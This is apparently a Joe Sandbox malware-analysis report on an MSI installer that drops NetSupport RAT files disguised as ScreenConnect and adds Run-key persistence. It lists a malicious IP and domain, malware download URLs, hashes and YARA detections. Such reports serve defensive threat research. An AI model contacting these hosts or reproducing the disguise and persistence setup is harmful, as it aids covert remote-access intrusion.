http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	PCICHEK.DLL.1.dr, AudioCapture.dll.1.dr	false		high
https://9.queue.core.chinacloudapi.cn	Veeam.Backup.Model.dll.1.dr	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/rpa00	TCCTL32.DLL.1.dr, client32.exe.1.dr	false		high
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	remcmdstub.exe.1.dr, PCICHEK.DLL.1.dr, AudioCapture.dll.1.dr, pcicapi.dll.1.dr	false		high
http://tempuri.org/PrefetchFilesSpec.xsd	Veeam.Backup.Model.dll.1.dr	false		high
http://tempuri.org/RequestUpdateSpec.xsdKInvalid	Veeam.Backup.Model.dll.1.dr	false		high
https://vault.usgovcloudapi.net-core.usgovcloudapi.netkhttps://manage.windowsazure.us/publishsetting	Veeam.Backup.Model.dll.1.dr	false	Avira URL Cloud: safe	unknown
http://geo.netsupportsoftware.com/location/loca.aspcJeY	client32.exe, 00000003.00000003.2336112737.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.4452829434.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://manage.windowsazure.com/PublishSettings/	Veeam.Backup.Model.dll.1.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
95.179.156.158	armayalitim1722.com	Netherlands		20473	AS-CHOOPAUS	true
172.67.68.212	geo.netsupportsoftware.com	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1552423
Start date and time:	2024-11-08 18:59:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	72BF1aHUKl.msi renamed because original name is a hash value
Original Sample Name:	a6b7839d287c71e8c724df8cc024c4f7d7ae9057.msi
Detection:	MAL
Classification:	mal68.rans.evad.winMSI@9/52@3/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 78% Number of executed functions: 115 Number of non-executed functions: 214
Cookbook Comments:	Found application associated with file extension: .msi Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: 72BF1aHUKl.msi

Simulations

Behavior and APIs

Time	Type	Description
13:00:30	API Interceptor	15112491x Sleep call for process: client32.exe modified
18:59:58	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ScreenConnect C:\ProgramData\MScreenConnect\client32.exe
19:00:06	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ScreenConnect C:\ProgramData\MScreenConnect\client32.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.68.212	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	geo.netsupportsoftware.com/location/loca.asp
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	geo.netsupportsoftware.com/location/loca.asp
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	geo.netsupportsoftware.com/location/loca.asp
	https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	geo.netsupportsoftware.com/location/loca.asp
	file.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	https://inspyrehomedesign.com/Ray-verify.html	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	file.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
geo.netsupportsoftware.com	hkpqXovZtS.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.0.231
	file.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.1.231
	file.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.1.231
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	172.67.68.212
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	172.67.68.212
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	172.67.68.212
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	104.26.1.231
	Advanced_IP_Scanner_2.5.4594.12.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	104.26.1.231
	Advanced_IP_Scanner_2.5.4594.12.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	104.26.1.231
	https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	172.67.68.212

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-CHOOPAUS	sora.mips.elf	Get hash	malicious	Mirai	Browse	149.28.47.121
	7sugT5Gudk.exe	Get hash	malicious	Unknown	Browse	45.32.92.201
	8WdO7I87E1.elf	Get hash	malicious	Mirai, Moobot	Browse	204.80.129.87
	e5AiOG6uDI.elf	Get hash	malicious	Mirai, Moobot	Browse	217.163.25.106
	Setup.exe	Get hash	malicious	Unknown	Browse	209.222.21.115
	Setup.exe	Get hash	malicious	Unknown	Browse	45.32.1.23
	yakuza.sparc.elf	Get hash	malicious	Unknown	Browse	144.203.17.212
	yakuza.arm5.elf	Get hash	malicious	Unknown	Browse	149.248.34.244
	PO238109.exe	Get hash	malicious	Remcos	Browse	45.32.153.255
	INQ9970.exe	Get hash	malicious	Remcos	Browse	45.32.153.255
CLOUDFLARENETUS	https://nleco-my.sharepoint.com/:u:/p/smartin/EYZSur4py4xKna-WAI8lgIkBS_KVLZwaA2d1wGxZA5Gdvw?e=wwT7sT	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.18.95.41
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	pago de PEDIDO PROFORMA.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	188.114.96.3
	http://jobs.sixlfags.com	Get hash	malicious	Unknown	Browse	104.21.43.150
	https://ascerta.aha.io/shared/edaa0f8ea0ea06d13e545667a40fae36	Get hash	malicious	Unknown	Browse	104.18.94.41
	https://m.exactag.com/cl.aspx?extProvApi=sixt-crm_newsletter&extProvId=313&extPu=nl_rac_de&extLi=DE_COR_RENT_CRM_B2C_24_CW33_From%20Intermediate%20Push_ONT_NLW_de_DE_Streichpreis_138402&extCr=Footer_rent&extSi=nl_rac_de_2408_DE&url=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%76%69%64%79%61%73%61%67%61%72%2D%70%74%74%69%2E%69%6E%2F%77%61%2F%66%61%2Fsgmflefb4v8va/%2F/bWF0dGhldy5kYXZpc0BtYnUuZWR1	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	188.114.96.3

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\MScreenConnect\HTCTL32.DLL	qvoLvRpRbr.msi	Get hash	malicious	NetSupport RAT	Browse
	EMX97rT0GX.msi	Get hash	malicious	NetSupport RAT	Browse
	Support_auto.msi	Get hash	malicious	NetSupport RAT	Browse
	SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe	Get hash	malicious	NetSupport RAT	Browse
	SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe	Get hash	malicious	NetSupport RAT	Browse
	SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe	Get hash	malicious	NetSupport RAT	Browse
	SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe	Get hash	malicious	NetSupport RAT	Browse
	SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe	Get hash	malicious	NetSupport RAT	Browse
	SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe	Get hash	malicious	NetSupport RAT	Browse
C:\ProgramData\MScreenConnect\AudioCapture.dll	qvoLvRpRbr.msi	Get hash	malicious	NetSupport RAT	Browse
	EMX97rT0GX.msi	Get hash	malicious	NetSupport RAT	Browse
	Support_auto.msi	Get hash	malicious	NetSupport RAT	Browse
	SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe	Get hash	malicious	NetSupport RAT	Browse
	SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe	Get hash	malicious	NetSupport RAT	Browse
	SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe	Get hash	malicious	NetSupport RAT	Browse
	SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe	Get hash	malicious	NetSupport RAT	Browse
	SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe	Get hash	malicious	NetSupport RAT	Browse
	SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe	Get hash	malicious	NetSupport RAT	Browse
	SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe	Get hash	malicious	NetSupport RAT	Browse

Created / dropped Files

C:\Config.Msi\519b7b.rbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	modified
Size (bytes):	10621
Entropy (8bit):	5.615927827799323
Encrypted:	false
SSDEEP:	96:03tO3UmcwX5+eGX31UzaheD2CWTCsThqxUUzaheD2CWTC6j8Y+bThqx5HIjPHTnZ:03t7ecOOEWOIyzOEWOdywjOLpex
MD5:	49BA9949C30C7C0DEB7590A66992A3A7
SHA1:	1DDBCF0B130B86CE1FFECF9C31584CC1ED2DC54E
SHA-256:	910B0CFCC5317CC6FCBCBED82335656E0D16B0A288A73FD85BE19AD83D439EAE
SHA-512:	A4FFA64030E653C16C8C0D6B8EA9BD1FFA842B048D17F2DAEBBC6EBAC01BC10054660A0BC54975D4916D7B9E3FF694FA6F80B7C0E7D3DF19F5BD9B116FB5EB2F
Malicious:	false
Reputation:	low
Preview:	...@IXOS.@.....@\|ghY.@.....@.....@.....@.....@.....@......&.{AA354307-EBD0-4C41-9B74-0AF1BD8AA230}..ScreenConnect..72BF1aHUKl.msi.@.....@.....@.....@........&.{9B624BA3-42FE-4CC9-8146-EDCB22CEEA11}.....@.....@.....@.....@.......@.....@.....@.......@......ScreenConnect......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{B5F5E367-F63E-4390-BA71-027FFBEC21B6}&.{AA354307-EBD0-4C41-9B74-0AF1BD8AA230}.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]....C:\ProgramData\MScreenConnect\......C:\ProgramData\MScreenConnect\AudioCapture.dll....,.C:\ProgramData\MScreenConnect\appverifUI.dll.....C:\ProgramData\MScreenConnect\vfcompat.dll....1.C:\ProgramData\MScreenConnect\Driver.VeeamFLR.log....4.C:\ProgramData\MScreenConnect\Veeam.Backup.Model.dll.....C:\ProgramData\MScreenConnect\client32.exe....*.C:\ProgramData\MScreenConnect\ir41_qcx.dll....).C:\ProgramData\MScreenCo

C:\ProgramData\MScreenConnect\AudioCapture.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	78840
Entropy (8bit):	6.635830973981154
Encrypted:	false
SSDEEP:	1536:96Y+zbZm8/v/k957pyPkLDfORFMTlrSWqNj5CdnTrioQ+ywlj5CdnTXZQ+8iA:96Y+HQ8/3k9RppYFclrLqNj5CdnTrIwp
MD5:	2A82792F7B45D537EDFE58EB758C1197
SHA1:	A039182D4D1EF29C6D8C238F20F7B8218C28F90C
SHA-256:	05AA13A6C1D18F691E552F04A996960917202A322D0DACFD330E553AD56978ED
SHA-512:	C6C6799B386E0D6489D9346F1D403B03B9425572E7418A93A72C413A4B9413945AAF4EA97A7D7B65772E5E3F00CFF65F180F6FEF51A26D4FDC2FF063816B5386
Malicious:	false
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\MScreenConnect\AudioCapture.dll, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: qvoLvRpRbr.msi, Detection: malicious, Browse Filename: EMX97rT0GX.msi, Detection: malicious, Browse Filename: Support_auto.msi, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........\...........7......................:....................2......3......4....Rich...........................PE..L...gf.a...........!.....\|...d......E1............0.......................... ......................................@...-...t...P.......h................O..........`..................................@...............(............................text....z.......\|.................. ..`.rdata..m6.......8..................@..@.data...`...........................@....rsrc...h...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

C:\ProgramData\MScreenConnect\Driver.VeeamFLR.log

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	86820
Entropy (8bit):	5.342998998878207
Encrypted:	false
SSDEEP:	768:iPPc+3myn55pVS7Z4tr2tmiESAwX1Mmkk:iPbtr2D
MD5:	BAD5328D039639B0DA197EA874897AFD
SHA1:	ED505C998770EF649DB5E1DEE66A6F459D31D67E
SHA-256:	FA1FB583617DB2D8E3C1BB8061BE202687C20F59B28982AE44D0668DD7669541
SHA-512:	45D8D85523E40FE5A16F7DD520F11EAD8A43F313509B8DA5CD9DF282F80DF3771DB5E2D9E9E0685C260C2F7252F10B5C7DE609F0A2580567E8E394E71243E005
Malicious:	false
Reputation:	low
Preview:	[24.12.2023 12:46:24.162] [4:174c: 00] TRACE: LOAD: start logging...[24.12.2023 12:46:24.166] [4:174c: 00] TRACE: LOAD: OS version: 10.0.19045 [512]...[24.12.2023 12:46:24.166] [4:174c: 00] TRACE: LOAD: Product version: [12.0.0.50], edition [DEV]...[24.12.2023 12:46:24.166] [4:174c: 00] TRACE: LOAD: File version: [12.0.0.50]...[24.12.2023 12:46:24.166] [4:174c: 00] TRACE: LOAD: Build timestamp: 19:34:00, 02/22/22...[24.12.2023 12:46:24.171] [4:174c: 00] ERROR: DriverCreateBootTimeMarker: 0001: c0000189..[24.12.2023 12:46:24.171] [4:174c: 00] WARNING: DriverEntry: 0003: c0000189..[24.12.2023 12:46:24.176] [4:174c: 00] WARNING: DetermineUseFastFileFinding: 0002: c0000034..[24.12.2023 12:46:24.176] [4:174c: 00] INFO: UseFastFileFinding is TRUE...[24.12.2023 12:46:24.176] [4:174c: 00] WARNING: rdbInit: 0005: c0000034..[24.12.2023 12:46:24.179] [4:174c: 00] WARNING: QueryDriverOptionLockPagedCodeNTFS: 0001: c0000034..[24.12.2023 12:46:24.179]

C:\ProgramData\MScreenConnect\HTCTL32.DLL

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	313552
Entropy (8bit):	6.750063959044223
Encrypted:	false
SSDEEP:	6144:Jd0nVF1ZtRq6itu9i3uxUnNPhMKj8TwFIKhJ08fvF0dGhZUbol:JYZrokUnNPhMY8TwFIcJB0i
MD5:	3EED18B47412D3F91A394AE880B56ED2
SHA1:	1B521A3ED4A577A33CCE78EEE627AE02445694AB
SHA-256:	13A17F2AD9288AAC8941D895251604BEB9524FA3C65C781197841EE15480A13F
SHA-512:	835F35AF4FD241CAA8B6A639626B8762DB8525CCCEB43AFE8FFFC24DFFAD76CA10852A5A8E9FC114BFBF7D1DC1950130A67037FC09B63A74374517A1F5448990
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Joe Sandbox View:	Filename: qvoLvRpRbr.msi, Detection: malicious, Browse Filename: EMX97rT0GX.msi, Detection: malicious, Browse Filename: Support_auto.msi, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f./.".A.".A.".A.9i.5.A.+..+.A.".@...A.9i...A.9i.X.A.9i.#.A.9i.#.A.9i.#.A.Rich".A.........................PE..L...!l>T...........!................V8.......................................@............@..........................c..1....W..d.......8......................../...................................>..@...............h............................text............................... ..`.rdata.............................@..@.data...lt...p...(...P..............@....rsrc...8............x..............@..@.reloc...0.......2..................@..B........................................................................................................................................................................................................................................................................................................................

C:\ProgramData\MScreenConnect\NSM.lic

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	262
Entropy (8bit):	5.159412672243952
Encrypted:	false
SSDEEP:	6:O/oPuHk4xRPjwx35vydDKHMoEEjLgpW2MOzx7oUIXZNWYpPM/ioeU6a8l6i7s:X0ZR7wxDJjjqW2MORzaNBPM/ioeUH8lM
MD5:	B9956282A0FED076ED083892E498AC69
SHA1:	D14A665438385203283030A189FF6C5E7C4BF518
SHA-256:	FCC6AFD664A8045BD61C398BE3C37A97536A199A48D277E11977F93868AE1ACC
SHA-512:	7DAA09113C0E8A36C91CC6D657C65851A20DFF6B60AC3D2F40C5737C12C1613C553955F84D131BA2139959973FEF9FC616CA5E968CB16C25ACF2D4739EED87EB
Malicious:	false
Preview:	1200..0x27aa3c3....; NetSupport License File...; Generated on 15:44 - 29/03/2014........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=DCVTTTUUEEW23..maxslaves=100000..os2=1..product=10..serial_no=NSM896597..shrink_wrap=0..transport=0..

C:\ProgramData\MScreenConnect\PCICHEK.DLL

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28656
Entropy (8bit):	6.972247952476263
Encrypted:	false
SSDEEP:	768:X52mBHj1XCdnJ8EriRGp9E+l/kaTj1XCdnJ8EZp9E+8iROA:JPBHj5CdnTrioQ+l/kaTj5CdnTZQ+8iX
MD5:	E311935A26EE920D5B7176CFA469253C
SHA1:	EDA6C815A02C4C91C9AACD819DC06E32ECECF8F0
SHA-256:	0038AB626624FA2DF9F65DD5E310B1206A9CD4D8AB7E65FB091CC25F13EBD34E
SHA-512:	48164E8841CFC91F4CBF4D3291D4F359518D081D9079A7995378F970E4085B534F4BAFC15B83F4824CC79B5A1E54457B879963589B1ACBCFE727A03EB3DFFD1C
Malicious:	false
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\MScreenConnect\PCICHEK.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 2%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........V...V...V...9.b.R.....f.W...9.`.W...9.T.S...9.U.T..._.m._...V...1...9.P.Z...9.e.W...9.d.W...9.c.W...RichV...........PE..L......^...........!......................... ...............................`.......e....@.........................p#..r....!..P....@............... ...O...P......P ............................... ..@............ ..D............................text...*........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................

C:\ProgramData\MScreenConnect\PCICL32.DLL

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3461200
Entropy (8bit):	6.522430452238238
Encrypted:	false
SSDEEP:	49152:oMnz9yqTXur/eAtTAh8bWbxnwDnsT2kaOgkcwSENUv7O:oMnzIqTXuCAtUh8b5xggAS7zO
MD5:	F782C24A376285C9B8A3A116175093F8
SHA1:	B8FDB6E95C7313CF31F14A3A31CC334B56E6DF09
SHA-256:	C7BAF1647F6FEF1B1A4231C9743F20F7A4B524CA4EB987A0ACBEEEF7E037D7E3
SHA-512:	256385A6663DCF70A5A9A1B766D1F826760F07EFA9B9248047DC43D41F6A9F4DD56CA2B218C222EA1D441E2F7BA9BB114CDE6954827B9761EBB1F23BBA7AD1BB
Malicious:	false
Yara Hits:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\ProgramData\MScreenConnect\PCICL32.DLL, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\MScreenConnect\PCICL32.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........Yg=.8.n.8.n.8.nDv.n.8.n..n.8.n.N.n.8.n(..n.8.n..n.8.n.@.n.8.n.8.n.;.n.@.n.8.n.@.n.8.n..n.8.n..n.8.n..n.8.n..n.8.n..n.8.nRich.8.n........................PE..L.....(S...........!........................................................`5......~5.............................0.......$............'............4.P....@3.(.... ..............................p...@....................}..`....................text............................... ..`.rdata..............................@..@.data...(...........................@....tls.................j..............@....hhshare.............l..............@....rsrc....'.......(...n..............@..@.reloc.......@3.......2.............@..B........................................................................................................................................................................................

C:\ProgramData\MScreenConnect\TCCTL32.DLL

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	397176
Entropy (8bit):	6.805828808723932
Encrypted:	false
SSDEEP:	12288:T63kUb4Rtmiqcn1gqjamCcmAPFdOKAeriUAb4yfytX:V5e+mCFEK6bffQX
MD5:	E5C78D4F6A7A886BD5A19A5F9B654A09
SHA1:	D38231380D37981BE65D0FA84E0001F4DDCC568C
SHA-256:	198CA24C0EF0D879CF475DCA9E0858DA4220F8624AEDF815C76CF33D0316C2B4
SHA-512:	E2BFD445B83A53B3F797EFBA4C8FF873CD99CF3B78D2CBDAF1005F09172DB21199E48E19268DD4056F9FF5EB7885CC9192FF7C49E79F8FBE8D69948920887683
Malicious:	false
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\MScreenConnect\TCCTL32.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 7%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L....HwX...........!................w................................................(....@.............................o...T...x....0..@...............x)...@..\E..................................`d..@...............h............................text...,........................... ..`.rdata../...........................@..@.data...h............~..............@....rsrc...@....0......................@..@.reloc..$F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\MScreenConnect\UIManagerBrokerps.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	10752
Entropy (8bit):	4.761618125965725
Encrypted:	false
SSDEEP:	192:ZW2DrdP1nJc7ve+YIAW1CmfCwAGCBCnh/frjEcCZCW2n2WRQn:sve+YIAW1xeInxrAZCW2n2W
MD5:	45B5D93521B7818CA11B2C7C9E8811A1
SHA1:	AF78BE041408DA9CE79C63B547FDC1CC195CC08E
SHA-256:	44619C9667DD6489DD6693EC07924AE0472BF82AEF9AD85608E988CDA97C2D67
SHA-512:	E2B4805CB3071CD38B8ED88ACE2E8F5C7E0DFB3BCFE11BE3E755798D1637AA064557AE28B4E791F886D336BB7D9CA41599E17C928C9AD23AD5D52443AD548AF2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........./.T.A_T.A_T.A_].._D.A_@.B^U.A_@.E^X.A_T.@_~.A_@.@^W.A_@.A^U.A_@.I^V.A_@.._U.A_@.C^U.A_RichT.A_................PE..L....w0............!................`........0...............................p............@A.........................!.......@.......P..@....................`..........T...........................0................@...............................text............................... ..`.data...`....0......................@....idata.......@......................@..@.rsrc...@....P......."..............@..@.reloc.......`.......(..............@..B........................................................................................................................................................................................................................................................................................................................

C:\ProgramData\MScreenConnect\Veeam.Backup.Model.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	6876320
Entropy (8bit):	6.023622321280125
Encrypted:	false
SSDEEP:	98304:aP6Jutwyvqv62f913VABvsAXnqzfLv0eN:aaDKP+9N
MD5:	D299A30E48CFD2FBE0101EC1C63BB3F1
SHA1:	5233FA0774E85856C27D2BDC2FE4A3E7AC18BA4E
SHA-256:	48DAA7BCC72EB701A61EF85B66F8D0CF9E9A6124CCA50DD271CD0656643CAAD6
SHA-512:	04C6059003FF9BA26B91965179823DA5BF15AC2C4EB5BB5669F22B6F0EA1CD663A9DD8D2A0CFE6AEEB6B4E2A8A94487CDEF654F116ABA77E0BB2D5003F054DA1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...E;[..........." ..0...h.........z.h.. ....h...... ........................i.....!.i...`.................................'.h.O.....h.D.............h..Z....h.....x.h.8............................................ ............... ..H............text.....h.. ....h................. ..`.rsrc...D.....h.......h.............@..@.reloc........h.......h.............@..B................[.h.....H.......t.....O...........h.......h.......................................(U...^.(U......[...%...}....:.(U.....}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}.......0..}........(V....r...p(W....r...p(X....r;..p(X.....(......(......(.......(.......(.......(.......(.......(.......(.......(.......(........0...........o.U...o......o9....

C:\ProgramData\MScreenConnect\WerEnc.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20632
Entropy (8bit):	6.530792585357305
Encrypted:	false
SSDEEP:	384:vtWK+FI/U8Y02qfc6W4ZW0CtDBRJKgR1lDzV7:EK+gbcEtCt1PKY3V7
MD5:	9EC373D2E9B1251B41277F334DB59609
SHA1:	AC531A8E849F77AD89D433E11205D5DC33DD8EAB
SHA-256:	CFBFB100B3F29F55EED75C3C7A503098EEC7C4070B63559F42EF30911FC7B16F
SHA-512:	3E4475DE9EA35BC95EEBABBA4E91D9CD414AB1B6892D9E3596A3F4AE4EE00671E0BDF1A84E05095EA948A93DA9327833277EB00F2586894FF34BD754CBCA45BE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
